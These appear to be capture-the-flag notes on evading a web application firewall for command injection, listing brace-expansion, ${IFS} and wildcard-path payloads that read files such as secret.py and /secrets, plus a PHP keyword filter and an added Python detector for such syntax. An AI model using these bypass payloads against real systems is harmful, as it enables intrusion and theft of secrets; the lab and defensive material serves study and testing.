WAF

Char Evasion 'spaces'

{ls,-la,/root}
{cat,file.txt}
cat${IFS}file.txt

/&pwd/&pwd
/var/task&{cat,secret.py}

{/var/log/,-la}
/var/log&{cat,yum.log}
/var/log&{ls,//var/log/yum.log}
/&{cat,/var/log/yum.log}
/&{ls,-la,/home/target/}

Found this hiding behind ...  instead of . ..
{/var/task/...,-la}

WAF Wars

  • The bash shell allows wildcards.

  • These can be helpful to run commands that may be blocked by the WAF.

  • There are many functions that can manipulate text.

  • Try looking at the man pages for iconv or cut.

ls -la /secrets

$cmd = "ls -la /secrets";
$output = shell_exec($cmd);
$c = "p"; $m = "w"; $d = "d";
$output = shell_exec($c . $m . $d);

ls -la /secrets
/???/?s
/bin/ps

/???/?s /s?????s
"flag","f","l","a","g"
/???/??t 

$egress_ruleset = array("BLAB","{","}",
"flag","secret","password","ssn","confidential");

file
flag
password
pins
ssn
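
A keyword ruleset such as the `$egress_ruleset` array above matches literal strings, while the shell expands wildcards, braces and variables only after the filter has run. The following is an added example, not code from the original page: it flags the expansion syntax used by the strings on this page and validates the value against an allowlist instead; the blocklist words, the function names and the `report-2024.txt` sample are assumptions.

```python
import re

# Assumed ingress keyword list, modelled on the page's $egress_ruleset (hypothetical).
BLOCKED_WORDS = ("ls", "cat", "cut", "pwd", "flag", "secret", "password")

# Shell expansion syntax that the payloads on this page depend on.
EXPANSION_PATTERNS = {
    "glob": re.compile(r"[?*\[\]]"),                # /???/c?t
    "brace": re.compile(r"\{[^{}]*,[^{}]*\}"),      # {cat,file.txt}
    "variable": re.compile(r"\$(\{?\w+\}?|\()"),    # ${IFS}, $c$m$d, $(...)
    "control": re.compile(r"[&|;`<>\n]"),           # /var/log&{...}
}

# Allowlist for a parameter that should only ever be a plain file name.
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")


def blocklist_passes(value):
    """Literal keyword matching: True means the naive filter lets the value through."""
    lowered = value.lower()
    return not any(word in lowered for word in BLOCKED_WORDS)


def expansion_features(value):
    """Sorted names of the shell expansion features found in the value."""
    return sorted(n for n, rx in EXPANSION_PATTERNS.items() if rx.search(value))


def is_safe_name(value):
    """Allowlist check: rejects '/', whitespace, '..', '...' and all metacharacters."""
    return SAFE_NAME.fullmatch(value) is not None


def triage(value):
    return {
        "blocklist_passes": blocklist_passes(value),
        "features": expansion_features(value),
        "safe_name": is_safe_name(value),
    }


# Strings from the page, plus one benign value (constructed).
SAMPLES = ["/???/c?t /s?????s/", "cat${IFS}file.txt",
           "/var/log&{cat,yum.log}", "report-2024.txt"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:28} {triage(sample)}")
```

In the application itself, pass the validated name as a separate argument to the program without going through a shell, so wildcards and braces are never expanded.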

/???/??t ./pins
/???/c?t 
/???/?s         ..ls works
/???/e??o hi    ..echo works!!!
/???/c?t /s?????s/
/u??/???/?s   ..might be 'ls' ?
/u??/???/c?t   ..might be 'cat' ?
/u??/???/c?t -c1  /s????ts/????

Answer:
cut -b8-30

/u??/???/c?t -b1-5  /s????ts/????
/u??/???/c?t -b8-30  /s????ts/????

FLAG{waf_3vision_w1n}
